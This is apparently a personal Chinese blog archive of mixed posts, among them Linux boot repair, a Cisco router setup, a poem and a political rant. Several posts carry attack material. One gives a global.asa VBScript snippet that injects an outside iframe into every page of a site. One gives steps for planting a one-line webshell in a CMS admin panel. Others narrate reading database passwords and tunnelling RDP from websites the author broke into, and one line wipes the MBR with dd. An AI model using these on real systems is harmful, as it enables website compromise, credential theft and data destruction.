SpookZanG

By:SpookZanG

本文没有任何技术含量….

一、Linux启动加载程序顺序

我大概说下：开机–>BIOS初始化–>判断启动设备（是硬盘、光驱、USB、网络等等）–>kernel初始化–>init–>终端–>shell

在 判断启动设备 时，他会读取 /boot/grub/grub.conf 文件

如果此文件出问题或不存在，Linux即不可能正常启动。

而在 init 时，他会读取 /etc/inittab 文件，此文件存放着一些启动顺序，级别等，如果此文件损坏，也不能启动。

二、解决方法

1、/boot/grub/grub.conf 破坏、丢失

启动Linux时，如图

此时按任意键，进入grub，然后在界面 按 c ，自己写入grep

如图（注：请不要按照跟我一样的输入，请按照自己的实际情况输入）

然后启动，即可正常进入Xwindows，然后修改/boot/grub/grub.conf，保存即可。

我此处的错误为kernel载入文件不存在（即文件名错误，改成存在即可）

二、/etc/inittab 被破坏 root密码忘记

这两种情况解决方法一样。

/etc/inittab，被破坏，修改。错误如图

此图 运行级别为9 不存在这个级别，所以报错

还是跟“一”一样方法，进入grub，自己写入grub，进入单用户模式，然后修改 /etc/inittab 或者用 passwd 重置root帐号密码(用于root密码忘记时)

如图 进入单用户模式与“一” 不同的是，在写“root=”时 在最后加入“ 1”即可

启动，进入单用户模式

修改/etc/inittab文件，把其值改为5(即Xwindows)

最后在扯两句，如果MBR被删掉的话…(dd < /dev/zero > /dev/sda bs=446 count=1 ) ，只能通过光盘或者网络来引导了…

作者：SpookZanG

今天渗透某网站，发现他是通过UDL来连接数据库的。

即conn包含了xx.udl，然后udl来连接xx.xx.xx.xx服务器上的数据库。

如图：

众所周知，udl是数据连接文件，使用通用数据链接 (UDL) 文件来保存连接字符串。UDL 文件包含了关于 OLE DB 连接的几乎全部信息，如用户名、密码等等等等。

下面就是一个UDL

Provider=Microsoft.Jet.OLEDB.4.0;

Data Source=D:\SpookZanG\SpZ!.mdb;User ID=admin;Password=1;Jet OLEDB:Database Password=1″

或者

[oledb]
; Everything after this line is an OLE DB initstring
Provider=SQL.1;Password=1;Persist Security Info=True;User ID=admin;Initial Catalog=admin;Data Source=xxx.xxx.xxx.xxx

最后说一下，UDL文件密码的读取，其实很简单，用记事本打开后缀为.udl的就可以了。一般如果你要是写UDL的话，也用记事本来写就成了。

本文如有错误，欢迎指出.

很大！

我触景生情，特意赋诗一首，名为《雪赞》，此诗非常的妙，虽然诗句写的是雪，但是没有一个字写到“雪”字。

天上一阵黑咕隆，
好像白面往下扔。
坟头到比馒头大，
井是一个大窟窿。

此诗的第一句，写了下雪之前阴霾的天气，第二句写出了雪非常大，第三句写出了雪下到坟头上，整个坟头都白了，并用坟头和馒头做了一个比喻。第四句说的是，雪下到井上，因为井没有井盖，所以是个大窟窿。

妙诗！

作者：SpookZanG

1、什么是Application ID

Application ID是通知Yahoo更新的必要ID。如果你拥有Google XML Sitemaps这个插件，就会在设置页面找到他。

2、申请过程

先来到Google XML Sitemaps的设置页面，看到 “提醒 Yahoo 关于你 Blog 的更新”，然后点击下面的“点击这里申请一个”

然后来到登录页面，如果你有Yahoo的邮箱（中国雅虎的也可以），就能直接登录，否则得注册帐号。

如果对于英文不熟悉的，可以去这里注册一个yahoo的帐号，全中文注册。

http://mail.cn.yahoo.com/

直接选择注册即可，注册完成之后，你的邮箱就是上图中Yahoo的ID，邮箱密码就是Yahoo的ID密码。

登录到这里之后，在输入一次密码，即可来到申请页面。

在往后，按自己的情况如实填写。

最后，点击下面那个按钮，即可得到你自己的Application ID。

前些天，广电局发布了一个全国骂声一片的消息：封杀所有P2P，BT下再。

导致BTChina和VeryCD，等等提供下载的网站被封杀。

其手笔之大，可说是惊天地，泣鬼神了——招致全民一片骂声

当然，天朝政府不仅仅会制造出一片骂声，他们还会 舆论向导。

自己在网站上发起个投票，然后自己设置设置投票的票数，最后总结出：87.1%的网友对于封杀BT反应不大。

记得有人曾经说过：以前天朝政府办事不征求民意，现在天朝政府办事自己制造民意。

后来，我跟同宿舍的童鞋们讨论了一下，大家一致认为，现在天朝已经非常不得民心了。

就像我银人网上的签名一样，天朝政府现在就是在“自作”，总有一天会“自受”的。

WLK在中国的上市已经是明年的事情了，所以我决定前往台服了，如果顺利就不回来了。

天朝已经做了太多太多的傻事，总有一天会遭到报应，并且我肯定会看到那一天！因为那一天就在未来的40年.

By：SpookZanG

本文如有错误欢迎指正，如有更好的解决方法或者彻底解决方法，欢迎留言。

今天在搞某网站的时候，发现其处于内网当中（Win 2003），于是用LCX把他的3389给反弹出来到我的计算机（Vista），然后在我的计算机登录。

发现直接弹出如下的提示（连输入用户名密码的界面都没出现）：

客户端无法连接,您以连接到这台计算机的控制台。无法建立新的会话。

因为以前没有遇到过这样的问题，于是google了一下，发现遇到这种问题的人很多，却没有人能给出解决方法。

我是用Vista来连接的WIN 2003   而用XP连接VISTA的人也遇到这种情况

首先我感觉应该排除防火墙的问题，因为如果存在防火墙的话，就会直接阻止我的连接了。

之后我想，会不会是2003那端限制了登录3389机器的类型呢？

我找来一台同为Win 2003的机器，在其上登录（也就是用2003来登录2003），发现成功登录。

Moyo[S.c.T] & SpooKZanG[S.c.T]

首先声明：
一、本文毫无技术含量，高手绕道。
二、本文并非教授挂马知识，目的在于为广大站长提供一些防护思路。

一、什么是global.asa？
Global.asa 文件是一个可选的文件，它可包含可被 ASP 应用程序中每个页面访问的对象、变量以及方法的声明。

Global.asa 文件可包含下列内容：

• Application 事件
• Session 事件
• <object> 声明
• TypeLibrary 声明
• #include 命令

注释：Global.asa 文件须存放于 ASP 应用程序的根目录中，且每个应用程序只能有一个 Global.asa 文件。

通过以上信息，我们能够知道，任何一个ASP程序在执行时，都会调用global.asa，这就给我们留下了一些隐患。

二、怎样实现
只要我们在网站下面建立一个global.asa，并且写入如下内容：

1
2
3
4
5

<script LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
End Sub
Response.Write "<iframe src=http://www.spookzang.net width=220 height=220></iframe>"
</script>

这样用户在第一次打开网页的时候就会触发挂马。

三、怎样预防
注意自己网站下面的global.asa文件，是否被改写或者添加。

因为其不像iframe，JS等挂马方法，能通过查看源码得到信息。
他只需在网站根目录下建立一个global.asa，然后在里面写入挂马内容即可让整个网站被挂马，而不需要在整个网站的网页内加入挂马内容。

这是发生在2天以前的事情了。

Q:你好FoV，首先能告诉我们为什么离开mousesports并且结束职业生涯吗?
A:我觉得现在是要去服兵役的时候了，像Lucifer和Soju那样。我想继续但是已经不允许了。

SpookZanG[S.c.T]

毫无技术，纯属瞎蒙
乔客(JoeKoe) CMS 4.0后台拿shell。

来到后台—>系统管理—>网站配置—>网站名称—>在网站名称那里写入一句话。

然后通过一句话链接器连接. www.XXX.com/index.asp 即可！

本文纯属无聊之作，毫无技术可言，高手绕道，闭眼。

如有错误欢迎指正！

某公司在上海和广东各有一个分公司，此公司打算通过路由组把两个异地的公司组建起局域网。

如下图

已知：上海(DCE)

IP：202.106.1.1

子网：255.255.255.0

局域网：192.168.0.1~192.168.0.2

交换机：192.168.0.100

广东 (DTE)：

IP：202.106.1.2

子网：255.0.0.0

局域网：10.0.0.1~10.0.0.2

交换机：10.0.0.100

只写出上海的路由配置。

enable (进入特权模式)

config terminal (进入全局模式)

hostname ShangHai（把名字改为shanghai）

interface serial 0（进入零号串口）

ip address 202.106.1.1 255.255.255.0（配置IP和掩码）

bandwith 20000 (配置带宽为2M，默认为1.5M)

clock rate 64 (配置时钟频率，因为是模拟机，所以时钟频率设为64)【广东不用设置】

ip nat outside

no shutdown (启动端口)

end(退出至特权模式)

设置局域网

cinfg terminal

interface ethernet 0

ip address 192.168.0.100 255.255.255.0

ip nat inside

no shutdown

设置代理上网

access-list 1 permit 192.168.0.0 0.0.0.255

ip nat inside source list 1 interface serial 0 overload

设置静态路由(广东与其相反，输入上海的内网IP 掩码 外网IP)

ip route 10.0.0.0 255.0.0.0 202.106.1.2

再把内网的PC机以及广东的设置好之后我们就能看到效果了，在广东的PC4上ping 192.168.0.1（上海的机器）,能ping通。

广东设置截图